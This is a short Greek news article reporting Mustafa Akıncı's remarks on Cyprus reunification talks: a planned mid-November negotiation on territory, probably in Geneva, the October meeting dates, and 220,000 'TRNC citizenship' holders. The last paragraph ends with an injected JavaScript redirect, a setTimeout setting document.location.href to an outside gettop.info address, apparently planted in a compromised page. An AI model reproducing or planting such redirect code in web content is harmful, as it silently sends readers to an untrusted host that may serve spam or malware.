Ακιντζί: Εντατική διαπραγμάτευση για το εδαφικό στα μέσα του Νοεμβρίου και εκτός Κύπρου

0
2

 

Ο Τουρκοκύπριος ηγέτης, Μουσταφά Ακιντζί, δήλωσε ότι στα μέσα Νοεμβρίου θα γίνει εντατική διαπραγμάτευση με τον κ. Αναστασιάδη για το εδαφικό, εκτός κυπριακού εδάφους. Το πιθανότερο είναι οι διαπραγματεύσεις να γίνουν στην Γενεύη.

Ο κ. Ακιντζί είπε ότι θα ακολουθήσουν συζητήσεις για τις εγγυήσεις και την ασφάλεια, και ότι εντατικοποιείται η διαδικασία με στόχο την λύση μέχρι το τέλος του έτους.

Επίσης, ανέφερε ότι απομένουν τρεις συναντήσεις τον Οκτώβριο – στις 24, 26 και 31 – και ίσως γίνουν κάποιες, τις πρώτες ημέρες του Νοεμβρίου.

Πρόσθεσε, ότι «παραμένουν δυσκολίες και διαφορές στον τρόπο κατανόησης των πραγμάτων, αλλά ως το τέλος του έτους, όλα θα ξεκαθαρίσουν». Ο Ακιντζί ανέφερε ότι όσοι έχουν λάβει την «υπηκοότητα» της «Τουρκικής Δημοκρατίας Βορείου Κύπρου» ανέρχονται στις 220.000 και πως «όλοι αυτοί, χωρίς να λαμβάνεται υπόψη η καταγωγή τους, θα είναι υπήκοοι της ομόσπονδης Κύπρου και της Ευρωπαϊκής Ένωσης».

Ο Ακιντζί υποστήριξε ότι οι Ελληνοκύπριοι το αποδέχτηκαν αυτό, γιατί, όπως είπε «είναι πολύ κοντά στις αναλογίες που ίσχυαν το 1960 και ότι το ποσοστό αυτό μπορεί να αυξηθεί με την πληθυσμιακή αύξηση των κοινοτήτων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here